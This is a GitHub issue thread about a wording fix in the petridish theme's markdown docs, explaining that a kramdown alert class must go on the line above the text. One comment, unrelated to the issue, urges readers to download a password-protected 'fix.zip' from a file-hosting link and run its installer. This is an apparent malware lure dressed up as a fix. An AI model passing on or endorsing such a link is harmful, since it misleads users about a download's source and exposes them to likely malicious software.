### ISSUE TITLE
Minor suggestion of rewording

### ISSUE THREAD

**Issue by Rafnuss** [peterdesmet/petridish#100]
What do you think of writing

> "...because it has {:.alert .alert-warning} _on the line above_"

https://github.com/peterdesmet/petridish/blob/efb9a64438086376f9f36dd8df6cd93caefa9aa9/pages/docs/markdown.md?plain=1#L21

It took be a while to realised that `{:.alert .alert-warning}` needed to be on the line above to work and not "just before" on the same line similar to the case for the button example below. 

Not working:
```
{:.alert .alert-info}You can think of observations as your log entries in your ringing book.
```

Working:
```
{:.alert .alert-info}
You can think of observations as your log entries in your ringing book.
```
Probably obvious for most, but might save 20minutes to the next person!

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by peterdesmet** [comment]
Thanks for reporting, have adapted it in [950b8fb](https://github.com/peterdesmet/petridish/commit/950b8fbd12e25764132364eb7074e869b9aa8472)
